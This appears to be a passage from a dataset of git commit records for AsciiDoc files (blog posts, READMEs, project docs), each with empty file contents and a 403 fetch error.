2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfd5f55e4dc40884b0c7aaa7fcf603d22c945c5d","subject":"add the instructions to create the .po file","message":"add the instructions to create the .po file\n","repos":"savoirfairelinux\/sous-chef,savoirfairelinux\/sous-chef,madmath\/sous-chef,savoirfairelinux\/santropol-feast,savoirfairelinux\/santropol-feast,madmath\/sous-chef,madmath\/sous-chef,savoirfairelinux\/santropol-feast,savoirfairelinux\/sous-chef","old_file":"docs\/create_po_file.adoc","new_file":"docs\/create_po_file.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/savoirfairelinux\/sous-chef.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8b10c2fece805dd35b7396526ee0a09b8fee91c7","subject":"doc: implguide: add sections on typedefs and abi coniderations","message":"doc: implguide: add sections on typedefs and abi coniderations\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,nmorey\/odp,nmorey\/odp,mike-holmes-linaro\/odp,nmorey\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,dkrot\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"71093728adc5f2caf0bd701802c7ea598809943f","subject":"Update 2015-04-15-titre-du-post.adoc","message":"Update 2015-04-15-titre-du-post.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-titre-du-post.adoc","new_file":"_posts\/2015-04-15-titre-du-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd193e45a10e11f10bdcc271e0314bf3f2e1cd48","subject":"Update 2018-11-28-vr-programing.adoc","message":"Update 2018-11-28-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-28-vr-programing.adoc","new_file":"_posts\/2018-11-28-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f2dd430d9ff00661ad724edb465489fd7683812","subject":"Explains public view of the table.","message":"Explains public view of the table.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/publictable.adoc","new_file":"docs\/publictable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8ebfc93c06ea297a585704eeddc19c53635b2a8","subject":"Update 2016-04-06-Primer-post.adoc","message":"Update 2016-04-06-Primer-post.adoc","repos":"crimarde\/crimarde.github.io,crimarde\/crimarde.github.io,crimarde\/crimarde.github.io,crimarde\/crimarde.github.io","old_file":"_posts\/2016-04-06-Primer-post.adoc","new_file":"_posts\/2016-04-06-Primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crimarde\/crimarde.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bef8ff8022e73441c7456b4968681582f2ae3be","subject":"Update 2016-07-24-Tiago-Alves.adoc","message":"Update 2016-07-24-Tiago-Alves.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Tiago-Alves.adoc","new_file":"_posts\/2016-07-24-Tiago-Alves.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a0afe84e86efc5bf028b42735bd313ece0acd81","subject":"Update 2017-01-14-Hello-World.adoc","message":"Update 2017-01-14-Hello-World.adoc","repos":"plaidshirtguy\/plaidshirtguy.github.io,plaidshirtguy\/plaidshirtguy.github.io,plaidshirtguy\/plaidshirtguy.github.io,plaidshirtguy\/plaidshirtguy.github.io","old_file":"_posts\/2017-01-14-Hello-World.adoc","new_file":"_posts\/2017-01-14-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/plaidshirtguy\/plaidshirtguy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aaf588b377c04f901887a782816c9ec68593097","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd2a1c1e446db4c45045dcf3f098e058230be7cd","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"499253b9a4e77d67e89e050c2f5c871ccc6a4b2a","subject":"y2b create post Unboxing My Ultimate McDonald's Burger...","message":"y2b create post Unboxing My Ultimate McDonald's Burger...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-29-Unboxing-My-Ultimate-McDonalds-Burger.adoc","new_file":"_posts\/2016-11-29-Unboxing-My-Ultimate-McDonalds-Burger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fb5cd928205c878ecf9978758ee3cfc5b204a2d","subject":"Update 2017-05-09-Army-Obligation-Complete.adoc","message":"Update 2017-05-09-Army-Obligation-Complete.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-05-09-Army-Obligation-Complete.adoc","new_file":"_posts\/2017-05-09-Army-Obligation-Complete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25f2fabcd47eb6a273ff366b4080f933248d458c","subject":"add missing tools overview page","message":"add missing tools overview page\n","repos":"clojure\/clojurescript-site","old_file":"content\/tools\/tools.adoc","new_file":"content\/tools\/tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b2d7a88a16e7bf0d20140dee2fb1327a2d48bc0e","subject":"y2b create post The $25,000 Mac Pro Workstation (2013)","message":"y2b create post The $25,000 Mac Pro Workstation (2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-10-27-The-25000-Mac-Pro-Workstation-2013.adoc","new_file":"_posts\/2013-10-27-The-25000-Mac-Pro-Workstation-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5743858dfa7cd6f739746ea7f4cc6c811ad3fad0","subject":"y2b create post INSANELY HUGE Gadget Giveaway!","message":"y2b create post INSANELY HUGE Gadget Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-29-INSANELY-HUGE-Gadget-Giveaway.adoc","new_file":"_posts\/2012-01-29-INSANELY-HUGE-Gadget-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57eaaf8fe06c32bc0f7e262090a56fd5fadd00c4","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6350620348b3eb4cbb1eee088b0f43c852c55fbb","subject":"y2b create post WATCH DOGS PRANK (Real Life Street Hack)","message":"y2b create post WATCH DOGS PRANK (Real Life Street Hack)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-05-16-WATCH-DOGS-PRANK-Real-Life-Street-Hack.adoc","new_file":"_posts\/2014-05-16-WATCH-DOGS-PRANK-Real-Life-Street-Hack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e1115b43b4cc50d64d0dd00f3b9d7ea774b8178","subject":"Add build status","message":"Add build status\n","repos":"rodm\/teamcity-gradle-init-scripts-plugin,rodm\/teamcity-gradle-init-scripts-plugin,rodm\/teamcity-gradle-init-scripts-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rodm\/teamcity-gradle-init-scripts-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdabcebefe88c5b0d2c6a886f3fe2db95dc96b06","subject":"\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u8ffd\u8a18","message":"\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u8ffd\u8a18\n","repos":"eighttails\/PC6001VX,eighttails\/PC6001VX,eighttails\/PC6001VX,eighttails\/PC6001VX,eighttails\/PC6001VX,eighttails\/PC6001VX","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eighttails\/PC6001VX.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"dce46644540732d2bbe23ca0a40d2685507191f9","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f829748ab89448a2365826d1c2e8c713e50aa0f","subject":"add example with volume","message":"add example with volume\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31e62fa9acaa11cd5a368239a5cf0031df9186c3","subject":"Convert README.md to Asciidoc, add deprecation warnings","message":"Convert README.md to Asciidoc, add deprecation warnings\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d14d89e56630303c13ec41336fa4d5a8ba91226a","subject":"Update 2015-06-02-title.adoc","message":"Update 2015-06-02-title.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-02-title.adoc","new_file":"_posts\/2015-06-02-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"179cb1c6019d7252b88e9cb2b064f4a9a72b6aba","subject":"Updated doc\/Z-PLUGINS.adoc","message":"Updated doc\/Z-PLUGINS.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/Z-PLUGINS.adoc","new_file":"doc\/Z-PLUGINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3743d2ed0d84690147e846c0e9fd542963a754a6","subject":"Renamed '_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc' to '_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc'","message":"Renamed '_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc' to '_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc'","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc","new_file":"_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797bbddfc9cebb26c5a2ef4ce9ba63e41c80be52","subject":"added domain intro section","message":"added domain intro section\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e06587724f12ea08beac3f8ab08985efba425803","subject":"Update 2015-05-17-Uber-das-Vergessen.adoc","message":"Update 2015-05-17-Uber-das-Vergessen.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-17-Uber-das-Vergessen.adoc","new_file":"_posts\/2015-05-17-Uber-das-Vergessen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bb9a1ce8d3b9048af6f4ea06a710509762a3180","subject":"Update 2016-08-07-Este-post-es-pa-ve.adoc","message":"Update 2016-08-07-Este-post-es-pa-ve.adoc","repos":"josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog","old_file":"_posts\/2016-08-07-Este-post-es-pa-ve.adoc","new_file":"_posts\/2016-08-07-Este-post-es-pa-ve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josegomezr\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"945819bf4b97d82531049f792fadf3c59ae94b43","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc21ef82c00b297952cba092a456643c74650858","subject":"Cleanup Asciidoctor format","message":"Cleanup Asciidoctor format\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7eb90770a003d86f7453da36ddf9e58e2720b948","subject":"Adding readme for ciruclar buffer","message":"Adding readme for ciruclar buffer\n","repos":"ldebello\/algorithms","old_file":"CircularBuffer\/README.adoc","new_file":"CircularBuffer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ldebello\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41c467aa866176a5cd6f48c1ecc20759bda46489","subject":"AsciiDoc template for API guide.","message":"AsciiDoc template for API guide.\n","repos":"vtsukur\/spring-rest-black-market,vtsukur\/spring-rest-black-market,vtsukur\/spring-rest-black-market","old_file":"src\/docs\/asciidoc\/api-guide.adoc","new_file":"src\/docs\/asciidoc\/api-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vtsukur\/spring-rest-black-market.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fce19997db5f5f42b6572d7415cc09fd1535c72","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bd28e501541616a5d9ec8e7b57d871c137a7afb","subject":"Update 2019-02-22-docker-selenium-with-php.adoc","message":"Update 2019-02-22-docker-selenium-with-php.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50545f3223c8eca0a2b6e6ebe807e46d08274889","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"febbd4fb8e2131850d2f96177dc87749606d5d7b","subject":"Update 2018-02-23-For-Things.adoc","message":"Update 2018-02-23-For-Things.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-02-23-For-Things.adoc","new_file":"_posts\/2018-02-23-For-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a55be6827c87a92f25ca24382a93ad0079938566","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8654a21159d6150c685c7311abc7c1110cda99e0","subject":"KUDU-2538: [docs] Document how to manually recover from Cfile corruption","message":"KUDU-2538: [docs] Document how to manually recover from Cfile corruption\n\nAdds troubleshooting documentation showing the\nsteps to manually recover from Cfile corruption.\n\nChange-Id: Ieefd472bef104921de7cab442fd49ab32c0fe81b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11218\nReviewed-by: Attila Bukor <53758272babe3057a5ff4ad51afd9bfd6e6014a1@apache.org>\nTested-by: Attila Bukor <53758272babe3057a5ff4ad51afd9bfd6e6014a1@apache.org>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f97a613ff85b5005552d438ba9c3e6eda93c5b5","subject":"Update 2016-10-19-Episode-75-When-Pinball-Loses-Its-Shine.adoc","message":"Update 2016-10-19-Episode-75-When-Pinball-Loses-Its-Shine.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-10-19-Episode-75-When-Pinball-Loses-Its-Shine.adoc","new_file":"_posts\/2016-10-19-Episode-75-When-Pinball-Loses-Its-Shine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbc02a9cb1ddfed84a8e95e2a43f2d61b0ac126d","subject":"y2b create post The Smartphone For Superheroes...","message":"y2b create post The Smartphone For Superheroes...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-02-The%20Smartphone%20For%20Superheroes....adoc","new_file":"_posts\/2017-12-02-The%20Smartphone%20For%20Superheroes....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5af26e7ac88e1c429da6ab92b0a1151ef52af79","subject":"Update 2017-02-21-3test-three.adoc","message":"Update 2017-02-21-3test-three.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21-3test-three.adoc","new_file":"_posts\/2017-02-21-3test-three.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bef2b895fbc202a8a42d0abc4bf7e8179389a32","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5d586d26167be8ad861783da37467d9a56f2a8e","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdd25dbcd376837b6aafbc8bdafdf22b24c6284b","subject":"Update 2017-09-11-nativescript-and-wordpress-rest-api.adoc","message":"Update 2017-09-11-nativescript-and-wordpress-rest-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-11-nativescript-and-wordpress-rest-api.adoc","new_file":"_posts\/2017-09-11-nativescript-and-wordpress-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46cda7db0973e7b11a437f78cdd69c9fb41369de","subject":"Docs: Clarify that refresh on update just refreshes the relevant shards","message":"Docs: Clarify that refresh on update just refreshes the relevant 